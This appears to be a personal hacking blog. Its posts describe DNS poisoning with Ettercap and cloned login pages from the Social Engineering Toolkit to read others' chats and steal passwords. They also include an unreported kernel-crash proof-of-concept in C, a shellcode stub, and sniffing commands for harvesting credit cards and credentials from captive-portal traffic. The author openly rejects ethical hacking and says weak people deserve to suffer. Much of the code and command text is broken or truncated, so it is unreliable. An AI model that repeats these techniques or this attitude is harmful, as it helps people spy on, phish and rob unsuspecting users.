Reading chats

Well.. sometimes.. it’s needed to know what are writing others about you. Why?.. hum.. well, it’s a good question, and I have a great answer.. ok, no.. but yesterday I needed… so….

The most easy way is performing a DNS poisoning, using Ettercap. Open the the ettercap.dns, and modify the different domains you want to catch using the attack, for example.., *, *,,, etc…

So, after that you have two options; sniff the traffic using wireshark.. but you need to know that you will need to attack the SSL certificates in order to read the chats, or… open SET, and select the web vectors, clon the targets and point them to your computer, for example, clone

Now, using Ettercap select the targets you want to attack, select in the plug-ins “DNS poison”, and start sniffing. When the user requests a website that you included in the .dns file, he/she will be redirected to your computer and pwned!… you can catch the passwords, the chats, the requests, and it will be “transparent” because actually the DNS is answering with your IP to the victim.

Don’t judge me…

The new hackers… “ethical” hackers

[…] it focuses on how to become an ethical hacker. Mastering the art of hacking can be an extremely powerful skill that we hope will be used for good. The most successful hackers know how to navigate the thin line between right and wrong while hacking. Many people can break things, and even try to make a quick buck doing so. But imagine you can make the Internet safer, work with amazing companies around the world, and even get paid along the way. Your talent has the potential of keeping billions of people and their data secure. That is what we hope you aspire to.[…] – Pete Yaworski


Where went on the real hackers?… ethical hackers?… fuck Pete… have you sniffed the network at your school?, changed your notes?, stolen passwords?… good people always lose… hackers need to be unethical… fuck off with the world. If you can do something, do it.. weak people suffer, and it is ok.

I hate “ethical” hackers.

How to lose your Facebook account in some steps

Some months ago I lost my Facebook account, it was hacked by… yep.. by Karen. But, how the incredible, invencible, fabulous vendetta could be hacked?…

Well it was easy… actually very easy…

I was happy seeing a lot of extreme porn on the Internet when Karen asked me for help, so I connected to a VPN, yeap.. my fault, we were at the same IP range.

She used Ettercap to perform a DNS spoofing to, pointing to her computer, and in her computer she configured a fake landing page using The Social Engineering Toolkit. I usually need to be connected to different VPN’s to work, so it’s normal to me be disconnected from my accounts. I entered to the Facebook’s messenger, entered my credentials and… pwned!


And that’s all… you don’t fall me very well que we say!

Ping DoS on Linux (Android)

Yep… it sounds weird, maybe it sounds stupid coff.. coff.. and I know, it’s sooooo unuseful… but… well the story is this:

On saturday I went with a friend to hum… well not to walk because I live in a hell’s extension.. around 40º C so is not possible to walk but to go to some places and I tried to explain her what is the difference between hacking (pentesting, attacks to Facebook, Whatsapp interception, etc) and real hacking (mostly vuln-dev)… she started to laugh when I compared the hacking with art… and I told that yes, sometimes as you can start to write, to paint or do whatever you want to do to feel better, you can start to look for bugs… and it’s relaxing and amusing… so I showed her how to find a bug on hers phone.. and here is the result.

I’m not very sure if it is reported to Android or to the Kernel Linux project.. but I don’t want to have any thing to see with Google or with Linus Torvals… so I prefer just publish here the bug.. and in the other hand I a bad guy… so I don’t report bugs anymore.

Oh yeap… she was not convinced about hacking is like art and she told me that I’m friki because I like this kind of estrange things D: … I’m not a friki D:


#include <sys/socket.h>
#include <arpa/inet.h>
static int sockfd = 0;
static struct sockaddr_in addr = {0};

void fuzz(void * param){
addr.sin_family = 0;
printf("sin_family1 = %08lx\n", addr.sin_family);
connect(sockfd, (struct sockaddr *)&addr, 16);
int main(int argc, char **argv)
int thrd;
pthread_create(&thrd, NULL, fuzz, NULL);
addr.sin_family = 0x1a;
addr.sin_port = 0;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
connect(sockfd, (struct sockaddr *)&addr, 16);
addr.sin_family = 0;
return 0;

Without /etc/shadow

char tlayula[] =
(*(void(*) ()) tlayula)();

The life is cruel… and I’m worst B\

Attacking captive portals

I live near to USA, and there is so common the use of captive portals for everything, basically if you go to the bathroom you’ll find a captive portal to use the internet while you.. psss… the thing you do at the bathroom.

The captive portals are amazing places to steal juicy information like credit cards, passwords, credit cards, chats, credit cards, hashes, tokens and.. ah yeah!, credit cards.

Here my tips:

# airmon-ng start wlan0 [chanel]

# tshark -i wlanmon0 -Y "http.request.method == "GET"" || tshark -i wlanmon0 -Y "http.request.method == "POST"" | tee -a get3.

(Oh!.. this can redirect also de encrypted traffic)

# grep *.cgi *.pcap | while read line; do NOMBRE=$(echo $line | awk -F "PSM_LAST_NAME"={'print $2'} | cut -d' ' -f1) CUARTO= =$(echo $line | awk -F "ROOM_NO"={'print $2'} | cut -d' ' -f1)

(Also you can create a BASH script for the past line if you’re using a Pineapple).


Be careful, most part of the captive portals are protected by a SOC or at least an IDS… so… chill out 😉